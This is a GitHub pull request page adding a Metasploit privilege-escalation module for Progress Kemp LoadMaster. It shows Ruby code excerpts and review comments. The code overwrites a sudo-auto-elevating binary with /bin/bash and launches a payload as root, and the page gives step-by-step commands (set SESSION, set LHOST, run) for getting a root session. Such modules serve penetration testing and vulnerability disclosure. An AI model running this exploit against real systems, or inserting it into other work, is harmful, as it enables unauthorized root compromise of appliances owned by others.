New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Kemp Progress Loadmaster sudo abuse priv esc #19100
base: master
Are you sure you want to change the base?
Conversation
cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}") | ||
|
||
vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}") | ||
cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
||
vprint_status('Launching payload') | ||
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") | ||
ensure | ||
if exists?(datastore['BINARY_RENAME']) | ||
cmd_exec("sudo /bin/cp #{datastore['BINARY_RENAME']} #{datastore['TARGET_BINARY']}") | ||
cmd_exec("sudo /bin/rm #{datastore['BINARY_RENAME']}") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
For a couple of those commands, sudo
isn't required I think
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I believe I fixed that.....
vprint_status("Moving #{datastore['TARGET_BINARY']} to #{datastore['BINARY_RENAME']}") | ||
cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}") | ||
|
||
vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}") | ||
cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
||
vprint_status('Launching payload') | ||
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Why use /bin/bash
to launch the payload, instead of launching it directly?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You're right. I had played with it earlier, and it did not seem to work. I think my problem was that I was trying to directly copy, and I did not have the privileges to overwrite it directly, and needed to put the file in a temp location, then sudo cp the file over /bin/loadkeys. Switched to that, now, unless we're running a command payload.
8071197
to
742326a
Compare
cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
||
vprint_status('Launching payload') | ||
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") | |
cmd_exec("sudo '#{datastore['TARGET_BINARY']}' -c #'{datastore['TEMP_PAYLOAD']}'") |
All suggestions on #19150 should be addressed here, too.... |
execute_command(target_binary, binary_rename, payload.encoded) | ||
end | ||
ensure | ||
cmd_exec("sudo rm '#{target_binary}'") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
cmd_exec("sudo rm '#{target_binary}'") | |
cmd_exec("sudo rm '#{target_binary}'") unless target_binary_hash == file_remote_digestmd5(target_binary) |
This adds a privilege escalation module targeting Progress Kemp LoadMaster versions including
7.2.59.2.22338
. The vulnerability lies in the configuration to allowsudo
to auto elevate when run with certain files, but grants the non-root userbal
write permissions to those file. This exploit simply overwrites one of the files that auto-elevates with/bin/bash
and runs a payload within a root-enabled /bin/bash session.Verification
List the steps needed to make sure this thing works
bal
useruse exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024
set SESSION <session>
set LHOST <your host IP>
run
root
user.Note
The easiest way to test this is in conjunction with #18972, which this was a part of until we realized that when they patched CVE-2024-1212, they did not patch this.